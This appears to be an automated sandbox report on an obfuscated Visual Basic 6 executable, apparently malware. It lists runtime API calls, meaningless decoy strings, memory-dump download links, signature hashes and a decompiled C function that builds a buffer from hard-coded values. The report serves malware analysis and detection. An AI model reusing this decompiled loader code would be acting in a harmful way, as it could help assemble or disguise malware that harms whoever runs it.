__vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041CA0F
__vbaVarDup.MSVBVM60(0000000A,?), ref: 0041CA70
#606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CA7E
__vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CA8B
__vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041CA91
#574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAAD
__vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CABA
#696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAC0
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAE2
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CAFA
#648.MSVBVM60(0000000A), ref: 0041CB4A
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041CB62
#696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041CB99
#696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CBDD
__vbaNew2.MSVBVM60(0040259C,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CC02
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041CC67
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041CCC3
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041CCE8
#519.MSVBVM60(tilskrersaksene,?), ref: 0041CCF2
__vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041CCFF
#519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD05
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD12
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD36
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CD76
#648.MSVBVM60(0000000A), ref: 0041CD99
__vbaStrCopy.MSVBVM60 ref: 0041CDB9
__vbaFreeStr.MSVBVM60 ref: 0041CE1D
__vbaFreeVar.MSVBVM60 ref: 0041CE28
#527.MSVBVM60(Forretningsbrevet5), ref: 0041CE3C
__vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041CE49
__vbaFreeStr.MSVBVM60 ref: 0041CE6A
__vbaStrCopy.MSVBVM60 ref: 0041CE7A
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEC2
__vbaStrMove.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEF2
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEFD
#535.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CF02
#564.MSVBVM60(00000004,?), ref: 0041CF31
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CF4B
#685.MSVBVM60(00000004,?), ref: 0041CF5F
__vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CF6C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041CFB3
__vbaI4Var.MSVBVM60(?), ref: 0041CFE2
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,000006FC), ref: 0041D04E
__vbaFreeObj.MSVBVM60(00000000,00401260,00402340,000006FC), ref: 0041D068
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041D07D
#537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D08A
__vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D097
#696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D09D
#648.MSVBVM60(0000000A), ref: 0041D0C4
__vbaR8FixI4.MSVBVM60(0000000A), ref: 0041D0D6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D14C
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D166
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D171
#648.MSVBVM60(0000000A), ref: 0041D191
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000704), ref: 0041D1E7
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000704), ref: 0041D201
#648.MSVBVM60(0000000A), ref: 0041D221
#714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041D253
#648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041D273
#564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2A3
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2BD
__vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2F0
__vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D309
__vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041D37A
#581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D387
#713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D397
__vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D3A4
__vbaFpI4.MSVBVM60 ref: 0041D3C2
__vbaStrCopy.MSVBVM60 ref: 0041D3D8
__vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041D3F5
__vbaStrMove.MSVBVM60 ref: 0041D436
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D452
#696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D45F
#574.MSVBVM60(00000003), ref: 0041D486
__vbaStrMove.MSVBVM60(00000003), ref: 0041D493
__vbaR8IntI4.MSVBVM60(00000003), ref: 0041D49E
__vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041D4DB
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D518
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D532
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D53D
#696.MSVBVM60(Kainsmrkernes3), ref: 0041D547
__vbaStrCopy.MSVBVM60 ref: 0041D5C6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,0000070C), ref: 0041D624
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,0000070C), ref: 0041D63E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000710), ref: 0041D69F
__vbaVarDup.MSVBVM60(00000000,00401260,00402340,00000710), ref: 0041D6D3
#607.MSVBVM60(?,00000065,00000003), ref: 0041D6E8
__vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D6F4
__vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D701
__vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D711
__vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D747
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D787
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D79F
#705.MSVBVM60(00000002,00000000), ref: 0041D7C4
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D7D1
__vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D7D7
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D812
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D82C
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D837
__vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D841
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000718), ref: 0041D894
#525.MSVBVM60(00000067), ref: 0041D8B3
__vbaStrMove.MSVBVM60(00000067), ref: 0041D8C0
#618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8CC
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8D9
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8FD
__vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D920
__vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D94E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,0000071C), ref: 0041D98B
__vbaStrMove.MSVBVM60(00000000,00401260,00402340,0000071C), ref: 0041D9BB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D9E5
#564.MSVBVM60(00000005,?), ref: 0041DA1D
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041DA37
#541.MSVBVM60(?,16:16:16), ref: 0041DA57
__vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041DA6A
#519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DA70
__vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DA7D
#648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041DA9D
__vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DAE9
__vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DAF6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000720), ref: 0041DB2C
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041DB62
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041DB88
#696.MSVBVM60(00402900), ref: 0041DB95
#696.MSVBVM60(00402948,00402900), ref: 0041DBA6
__vbaStrCopy.MSVBVM60(00402948,00402900), ref: 0041DBBD
__vbaFreeStr.MSVBVM60 ref: 0041DC03
__vbaVarMove.MSVBVM60 ref: 0041DC2A
__vbaVarMove.MSVBVM60 ref: 0041DC4C
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041DC60
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041DC66
__vbaFreeVar.MSVBVM60(0041DD58), ref: 0041DD00
__vbaFreeStr.MSVBVM60(0041DD58), ref: 0041DD08
__vbaAryDestruct.MSVBVM60(00000000,?,0041DD58), ref: 0041DD1F
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD27
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD2F
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD37
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD3F
__vbaFreeVar.MSVBVM60(00000000,?,0041DD58), ref: 0041DD47
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD52

Strings

tril, xrefs: 0041D30F
tilskrersaksene, xrefs: 0041CCED
replicr, xrefs: 0041C96F
Benefact6, xrefs: 0041D3E4
SOLITRSKAKKEN, xrefs: 0041D936
blaarv, xrefs: 0041D110
Generalisations7, xrefs: 0041D83C
eudaemonistical, xrefs: 0041D382
multivalent, xrefs: 0041C85E
Kainsmrkernes3, xrefs: 0041D542
7:7:7, xrefs: 0041C7D6
Skovteknikeren6, xrefs: 0041DBB2
16:16:16, xrefs: 0041DA4B
Whiskysourens1, xrefs: 0041D4D6
DUMBFISH, xrefs: 0041D915
Admiraliteternes1, xrefs: 0041CDAE
STRUTTENDE, xrefs: 0041D8C7
centralregeringens, xrefs: 0041D5BB
=9, xrefs: 0041D5A9
Lersernes, xrefs: 0041D1AB
Forretningsbrevet5, xrefs: 0041CE37
CANNIBALEAN, xrefs: 0041C854
Vidnefast, xrefs: 0041CE6F
Bursati, xrefs: 0041C859
RODTEGNENES, xrefs: 0041D392
Udstillingslokalet, xrefs: 0041D742
ASCRY, xrefs: 0041D706
Utrecht8, xrefs: 0041D66A
Dagvagten, xrefs: 0041CBD8
Paucify9, xrefs: 0041D3CD
Snoreskrternes8, xrefs: 0041D31B
undrede, xrefs: 0041D5EA
ADMIRINGLY, xrefs: 0041D45A
Odontoma7, xrefs: 0041D5EF
Hjortens, xrefs: 0041C721
Fdres, xrefs: 0041D92C
SELVFINANSIEREDES, xrefs: 0041DBE4
OFFENTLIGHEDSSFRE, xrefs: 0041CB94
Readjust, xrefs: 0041C808
Indvi2, xrefs: 0041D931

Memory Dump Source

Source File: 00000000.00000002.777812019.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.777801767.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.777922397.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.777938364.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
API String ID: 1918163132-2023598156
Opcode ID: 9d686f8c3daf2795f549159a0ecb804572eb615873d9349ef6c38574d8506ea0
Instruction ID: 4f597cf3ee989f2d3e6e7cc483b1ea7435433e21d18263570a5c1f8dfc7ea310
Opcode Fuzzy Hash: 9d686f8c3daf2795f549159a0ecb804572eb615873d9349ef6c38574d8506ea0
Instruction Fuzzy Hash: E5D20875940228ABDB21EF61CD85FDDB7B8AF08304F1080EAE509BB1A1DB785B85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FFB0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041FFB0(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				short* _v52;
				char _v64;
				short _v72;
				void* _v76;
				char _v80;
				void* _v84;
				intOrPtr _v92;
				char _v100;
				char _v116;
				intOrPtr _v124;
				char _v132;
				short _v140;
				char _v148;
				char _v164;
				intOrPtr _v172;
				char _v180;
				char* _v204;
				intOrPtr _v212;
				void* _v232;
				char _v236;
				short _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr* _v264;
				signed int _v268;
				signed int _v272;
				signed int _t182;
				short _t184;
				char* _t191;
				short _t193;
				char* _t201;
				short _t204;
				short _t208;
				char* _t210;
				short _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				short _t222;
				signed int _t223;
				signed int _t225;
				signed int _t227;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				short _t237;
				signed int _t238;
				signed int _t240;
				short _t242;
				signed int _t243;
				char* _t245;
				char* _t250;
				signed int _t259;
				signed int _t264;
				signed int _t278;
				signed int _t287;
				signed int _t296;
				signed int _t300;
				signed int _t305;
				void* _t334;
				void* _t336;
				intOrPtr _t337;
				void* _t338;

				_t337 = _t336 - 0xc;
				 *[fs:0x0] = _t337;
				L00401540();
				_v16 = _t337;
				_v12 = 0x4013d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t334);
				L004017B6();
				_push(2);
				_push(0x402ff4);
				_t182 =  &_v64;
				_push(_t182);
				L0040186A();
				if((_t182 | 0xffffffff) != 0) {
					_v92 = 0x80020004;
					_v100 = 0xa;
					_push( &_v100);
					L00401648();
					_v36 = __fp0;
					L00401828();
					_push(0xd4);
					L00401786();
					L0040183A();
				}
				_v124 = 0x80020004;
				_v132 = 0xa;
				_t184 =  &_v132;
				_push(_t184);
				L004017F2();
				_v140 = _t184;
				_v148 = 2;
				_push( &_v148);
				_push( &_v164);
				L004016C0();
				_push(L"Rappees");
				_push(L"Jiggerens");
				_push( &_v100); // executed
				L00401732(); // executed
				_push( &_v100);
				_push( &_v116);
				L00401852();
				_push(0x52);
				_push( &_v164);
				_t191 =  &_v80;
				_push(_t191);
				L00401858();
				_push(_t191);
				L0040162A();
				_v172 = _t191;
				_v180 = 0x8008;
				_push( &_v116);
				_t193 =  &_v180;
				_push(_t193);
				L00401738();
				_v240 = _t193;
				L00401846();
				_push( &_v180);
				_push( &_v116);
				_push( &_v164);
				_push( &_v148);
				_push( &_v132);
				_push( &_v100);
				_push(6);
				L00401840();
				_t338 = _t337 + 0x1c;
				if(_v240 != 0) {
					_v204 = L"PREHISTORICS";
					_v212 = 8;
					L0040184C();
					_push(0xa2);
					_push( &_v100);
					_push( &_v116);
					L00401624();
					_v124 = 0x8d;
					_v132 = 2;
					_push( &_v132);
					_push(0x75);
					_push( &_v116);
					_t250 =  &_v80;
					_push(_t250);
					L00401858();
					_push(_t250);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_push(3);
					L00401840();
					_t338 = _t338 + 0x10;
					if( *0x4223c0 != 0) {
						_v264 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v264 = 0x4223c0;
					}
					_v240 =  *_v264;
					_t259 =  *((intOrPtr*)( *_v240 + 0x14))(_v240,  &_v84);
					asm("fclex");
					_v244 = _t259;
					if(_v244 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v240);
						_push(_v244);
						L004017C8();
						_v268 = _t259;
					}
					_v248 = _v84;
					_t264 =  *((intOrPtr*)( *_v248 + 0xc0))(_v248,  &_v232);
					asm("fclex");
					_v252 = _t264;
					if(_v252 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x4025ac);
						_push(_v248);
						_push(_v252);
						L004017C8();
						_v272 = _t264;
					}
					_v72 = _v232;
					L004017C2();
				}
				_v92 = 0x3a;
				_v100 = 2;
				_t201 =  &_v100;
				_push(_t201);
				_push(8);
				_push(L"UNINTERMITTEDLY");
				L004016A2();
				_v124 = _t201;
				_v132 = 0x8008;
				_push( &_v116);
				L004017FE();
				_push( &_v132);
				_t204 =  &_v116;
				_push(_t204);
				L00401738();
				_v240 = _t204;
				_push( &_v116);
				_push( &_v132);
				_push( &_v100);
				_push(3);
				L00401840();
				_t208 = _v240;
				if(_t208 != 0) {
					_push(0xb1);
					L00401756();
					L0040183A();
					_push(_t208);
					L004017EC();
					 *_v52 = _t208;
					L00401846();
					_push(L"MINESTRYGNING");
					L004017EC();
					 *((short*)(_v52 + 2)) = _t208;
					_push(L"2:2:2");
					_push( &_v100);
					L0040182E();
					_push( &_v100);
					_t213 =  &_v80;
					_push(_t213);
					L00401858();
					_push(_t213);
					L004017EC();
					_t278 = 2;
					 *((short*)(_v52 + (_t278 << 1))) = _t213;
					L00401846();
					L00401828();
					_t214 = 2;
					 *((short*)(_v52 + _t214 * 3)) = 0x4cf8;
					_t216 = 2;
					 *((short*)(_v52 + (_t216 << 2))) = 0xe04;
					_t218 = 2;
					 *((short*)(_v52 + _t218 * 5)) = 0x1773;
					_t220 = 2;
					 *((short*)(_v52 + _t220 * 6)) = 0x56a4;
					_v92 = 0x42458a;
					_v100 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t222 =  &_v100;
					_push(_t222);
					L0040161E();
					L0040183A();
					_push(_t222);
					L004017EC();
					_t287 = 2;
					 *((short*)(_v52 + _t287 * 7)) = _t222;
					L00401846();
					L00401828();
					_t223 = 2;
					 *((short*)(_v52 + (_t223 << 3))) = 0x196e;
					_t225 = 2;
					 *((short*)(_v52 + _t225 * 9)) = 0x15b6;
					_t227 = 2;
					 *((short*)(_v52 + _t227 * 0xa)) = 0x1a5;
					_t229 = 2;
					 *((short*)(_v52 + _t229 * 0xb)) = 0x3c4c;
					_t231 = 2;
					_t232 = _t231 * 0xc;
					 *((short*)(_v52 + _t232)) = 0x3974;
					_push(L"Suppositoriets");
					L004017EC();
					_t296 = 2;
					 *(_v52 + _t296 * 0xd) = _t232;
					_t233 = 2;
					 *((short*)(_v52 + _t233 * 0xe)) = 0x5ff7;
					_t235 = 2;
					 *((short*)(_v52 + _t235 * 0xf)) = 0x758c;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t237 =  &_v100;
					_push(_t237);
					L004017F2();
					_t300 = 2;
					 *((short*)(_v52 + (_t300 << 4))) = _t237;
					L00401828();
					_t238 = 2;
					 *((short*)(_v52 + _t238 * 0x11)) = 0xef8;
					_t240 = 2;
					 *((short*)(_v52 + _t240 * 0x12)) = 0x12b7;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t242 =  &_v100;
					_push(_t242);
					L004017F2();
					_t305 = 2;
					 *((short*)(_v52 + _t305 * 0x13)) = _t242;
					L00401828();
					_t243 = 2;
					 *((short*)(_v52 + _t243 * 0x14)) = 0x3e84;
					_v92 = 0x57f4;
					_v100 = 2;
					_push(L"BESMUDSES");
					_t245 =  &_v100;
					_push(_t245);
					L00401618();
					L0040183A();
					_push(_t245);
					L00401696();
					L0040183A();
					L00401846();
					L00401828();
				}
				asm("wait");
				_push(0x4205da);
				L00401846();
				L00401846();
				L00401846();
				_v236 =  &_v64;
				_t210 =  &_v236;
				_push(_t210);
				_push(0);
				L0040173E();
				L00401846();
				return _t210;
			}

0x0041ffb3
0x0041ffc2
0x0041ffce
0x0041ffd6
0x0041ffd9
0x0041ffe0
0x0041ffef
0x0041fff8
0x0041fffd
0x0041ffff
0x00420004
0x00420007
0x00420008
0x00420012
0x00420014
0x0042001b
0x00420025
0x00420026
0x0042002b
0x00420031
0x00420036
0x0042003b
0x00420045
0x00420045
0x0042004a
0x00420051
0x00420058
0x0042005b
0x0042005c
0x00420061
0x00420068
0x00420078
0x0042007f
0x00420080
0x00420085
0x0042008a
0x00420092
0x00420093
0x0042009b
0x0042009f
0x004200a0
0x004200a5
0x004200ad
0x004200ae
0x004200b1
0x004200b2
0x004200b7
0x004200b8
0x004200bd
0x004200c3
0x004200d0
0x004200d1
0x004200d7
0x004200d8
0x004200dd
0x004200e7
0x004200f2
0x004200f6
0x004200fd
0x00420104
0x00420108
0x0042010c
0x0042010d
0x0042010f
0x00420114
0x00420120
0x00420126
0x00420130
0x00420143
0x00420148
0x00420150
0x00420154
0x00420155
0x0042015a
0x00420161
0x0042016b
0x0042016c
0x00420171
0x00420172
0x00420175
0x00420176
0x0042017b
0x0042017c
0x00420186
0x0042018e
0x00420196
0x0042019a
0x0042019e
0x0042019f
0x004201a1
0x004201a6
0x004201b0
0x004201cd
0x004201b2
0x004201b2
0x004201b7
0x004201bc
0x004201c1
0x004201c1
0x004201df
0x004201f7
0x004201fa
0x004201fc
0x00420209
0x0042022b
0x0042020b
0x0042020b
0x0042020d
0x00420212
0x00420218
0x0042021e
0x00420223
0x00420223
0x00420235
0x00420250
0x00420256
0x00420258
0x00420265
0x0042028a
0x00420267
0x00420267
0x0042026c
0x00420271
0x00420277
0x0042027d
0x00420282
0x00420282
0x00420298
0x0042029f
0x0042029f
0x004202a4
0x004202ab
0x004202b2
0x004202b5
0x004202b6
0x004202b8
0x004202bd
0x004202c2
0x004202c5
0x004202cf
0x004202d0
0x004202d8
0x004202d9
0x004202dc
0x004202dd
0x004202e2
0x004202ec
0x004202f0
0x004202f4
0x004202f5
0x004202f7
0x004202ff
0x00420308
0x0042030e
0x00420313
0x0042031d
0x00420322
0x00420323
0x0042032b
0x00420331
0x00420336
0x0042033b
0x00420343
0x00420347
0x0042034f
0x00420350
0x00420358
0x00420359
0x0042035c
0x0042035d
0x00420362
0x00420363
0x0042036a
0x00420370
0x00420377
0x0042037f
0x00420386
0x0042038d
0x00420395
0x0042039c
0x004203a4
0x004203ab
0x004203b3
0x004203ba
0x004203c0
0x004203c7
0x004203ce
0x004203d0
0x004203d2
0x004203d4
0x004203d6
0x004203d9
0x004203da
0x004203e4
0x004203e9
0x004203ea
0x004203f1
0x004203f8
0x004203ff
0x00420407
0x0042040e
0x00420415
0x0042041d
0x00420424
0x0042042c
0x00420433
0x0042043b
0x00420442
0x0042044a
0x0042044b
0x00420451
0x00420457
0x0042045c
0x00420463
0x0042046a
0x00420470
0x00420477
0x0042047f
0x00420486
0x0042048c
0x00420493
0x0042049a
0x0042049d
0x0042049e
0x004204a5
0x004204ac
0x004204b3
0x004204ba
0x004204c1
0x004204c9
0x004204d0
0x004204d6
0x004204dd
0x004204e4
0x004204e7
0x004204e8
0x004204ef
0x004204f6
0x004204fd
0x00420504
0x0042050b
0x00420511
0x00420518
0x0042051f
0x00420524
0x00420527
0x00420528
0x00420532
0x00420537
0x00420538
0x00420542
0x0042054a
0x00420552
0x00420552
0x00420557
0x00420558
0x004205a5
0x004205ad
0x004205b5
0x004205bd
0x004205c3
0x004205c9
0x004205ca
0x004205cc
0x004205d4
0x004205d9

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FFCE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FFF8
__vbaAryConstruct2.MSVBVM60(?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420008
#593.MSVBVM60(0000000A), ref: 00420026
__vbaFreeVar.MSVBVM60(0000000A), ref: 00420031
#537.MSVBVM60(000000D4,0000000A), ref: 0042003B
__vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 00420045
#648.MSVBVM60(0000000A), ref: 0042005C
#652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 00420080
#692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 00420093
#522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200A0
__vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200B2
#514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200B8
__vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004200D8
__vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004200E7
__vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0042010F
__vbaVarDup.MSVBVM60 ref: 00420143
#513.MSVBVM60(?,?,000000A2), ref: 00420155
__vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 00420176
#628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042017C
__vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 00420186
__vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042018E
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 004201A1
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004201BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0042021E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,000000C0), ref: 0042027D
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,000000C0), ref: 0042029F
#628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 004202BD
#670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202D0
__vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202DD
__vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202F7
#525.MSVBVM60(000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420313
__vbaStrMove.MSVBVM60(000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 0042031D
#696.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420323
__vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420331
